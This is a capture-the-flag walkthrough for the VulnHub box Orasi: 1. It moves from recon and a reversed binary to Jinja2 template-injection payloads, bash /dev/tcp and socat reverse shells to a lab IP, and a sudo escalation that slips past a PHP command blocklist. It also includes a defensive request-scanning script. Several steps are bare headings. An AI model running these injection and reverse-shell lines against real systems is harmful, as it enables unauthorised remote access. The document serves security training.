VulnHub lab: ORASI: 1



Preparation:

Target: Orasi: 1, download address: https://download.vulnhub.com/orasi/Orasi.ova. After downloading, open it directly in VirtualBox.

Hidden information: "Hint : just one useless little dot", noticed while downloading.

I. Information gathering

1. nmap scan

2. FTP service

Sometimes things are not obvious
Element found: 36

 

Decompiled pseudocode
 // decompiled pseudocode (IDA), with the dropped parentheses restored
int __cdecl main(int argc, const char **argv, const char **envp)
{
  init = (__int64)malloc(8uLL);
  *(_BYTE *)init = 111;            // 'o'
  *(_DWORD *)(init + 4) = -1;
  // the inserted values are ASCII codes: 47 '/', 115 's', 104 'h', 52 '4',
  // 100 'd', 48 '0', 119 'w', 36 '$', 115 's'  ->  "/sh4d0w$s"
  insert(1LL, 47LL);
  insert(2LL, 115LL);
  insert(42LL, 104LL);
  insert(4LL, 52LL);
  insert(12LL, 100LL);
  insert(14LL, 48LL);
  insert(17LL, 119LL);
  insert(18LL, 36LL);
  insert(19LL, 115LL);
  puts("Sometimes things are not obvious");
  item = search(18LL);             // key 18 holds 36, i.e. '$'
  if ( item )
    printf("Element found: %d\n", (unsigned int)*(char *)item);
  else
    puts("Element not found");
  return 0;
}

I'm in the habit of looking at the pseudocode first, but nothing useful turned up here; later, in the program's flow graph (IDA View-1), I noticed that the register values strung together read /sh4d0w$s, which I guessed was a directory name.

3. Web access

4. Parameter brute-forcing

II. Getting a shell

1. SSTI injection

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("id").read().zfill(417)}}{%endif%}{% endfor %}

2. Reverse shell

# Character-encoding helper: just replace `strings`; this is reused later on
oct_result, dec_result, hex_result, bin_result = '', '', '', ''
strings = "import os;os.system('/bin/bash -i');"
# bash -i >& /dev/tcp/192.168.5.150/6688 0>&1
for string in strings:
    one_char = ord(string)
    dec_result = dec_result + str(one_char) + ' '
    # oct() gives '0o142'; swap the prefix for a backslash to get '\142'
    oct_result = oct_result + str(oct(one_char)).replace('0o', '\\')
    hex_result = hex_result + hex(one_char).replace('0x', '')
    bin_result = bin_result + bin(one_char) + ' '
print('Decimal: ' + dec_result)
print('Octal: ' + oct_result)
print('Hexadecimal: ' + hex_result)
print('Binary: ' + bin_result)
# Original statement
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >&/dev/tcp/192.168.5.150/6688 0>&1'").read().zfill(417)}}{%endif%}{% endfor %}

# Reverse-shell statement after encoding
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("\142\141\163\150\40\55\143\40\47\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\65\56\61\65\60\57\66\66\70\70\40\60\76\46\61\47").read().zfill(417)}}{%endif%}{% endfor %}
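From the defender's side, the octal encoding above is exactly why a keyword filter on raw request text misses this traffic. Below is an added example (my own code, not from the post or the box): a small Python checker that URL-decodes and expands \NNN / \xHH escapes before matching SSTI indicators; the request lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Indicators that appear in the Jinja2 SSTI payloads above, plus the shell
# commands they end up running. They are matched only after normalisation.
SSTI_TOKENS = ("__class__", "__subclasses__", "__builtins__", "__import__",
               "popen", "os.system", "bash", "/dev/tcp")
TEMPLATE_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
OCTAL_ESCAPE = re.compile(r"\\([0-7]{1,3})")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def normalize(text: str) -> str:
    """URL-decode, then expand \\NNN octal and \\xHH hex escapes the way a
    Python string literal would, so keyword matching sees the decoded text."""
    text = unquote(text)
    text = OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), text)
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text

def inspect_request(raw: str) -> list:
    """Return the indicators found in one request line (empty list = clean)."""
    norm = normalize(raw)
    hits = []
    if TEMPLATE_DELIMS.search(norm):
        hits.append("template_delims")
    hits.extend(tok for tok in SSTI_TOKENS if tok in norm)
    return hits

# Constructed sample request lines (hypothetical; not traffic from the box).
SAMPLE_REQUESTS = [
    "GET /?name=alice HTTP/1.1",
    "GET /?name={{x.__class__.__base__.__subclasses__()}} HTTP/1.1",
    # URL-encoded, with the command written as octal escapes as the post does.
    "GET /?name=%7B%7Bx.popen(%22%5C142%5C141%5C163%5C150%22)%7D%7D HTTP/1.1",
]

def scan(lines=SAMPLE_REQUESTS) -> dict:
    """Map each suspicious request line to the indicators it triggered."""
    report = {}
    for line in lines:
        hits = inspect_request(line)
        if hits:
            report[line] = hits
    return report

if __name__ == "__main__":
    for line, hits in scan().items():
        print(", ".join(hits), "<-", line)
```

The third sample only matches because normalize() turns `\142\141\163\150` back into `bash`; without that step the line would pass a plain keyword filter.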

III. Privilege escalation

1. Privilege escalation to kori

<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);

if($var == null) die("Orasis Jail, argument missing\n");

// Blocklist filter: any match rejects the whole command line.
// Note that socat is not on the list, which is what the bypass below relies on.
function filter($var) {
        if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        $result = exec($var);
        echo "$result\n";
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>

I started with the commands below: they either connected but with the wrong permissions, or connected but could not execute commands. I kept swapping the shell command, and finally found that socat TCP:192.168.5.150:8899 EXEC:sh works; that gave a new shell and successfully escalated to the kori user.

# These had problems
sudo -u kori /bin/php /home/kori/jail.php sh -i >& /dev/tcp/192.168.5.150/8899 0>&1
sudo -u kori /bin/php /home/kori/jail.php 0<&196;exec 196<>/dev/tcp/192.168.5.150/88991; sh <&196 >&196 2>&196

# This one finally worked
sudo -u kori /bin/php /home/kori/jail.php socat TCP:192.168.5.150:8899 EXEC:sh

2. Privilege escalation to irida

3. Privilege escalation to root
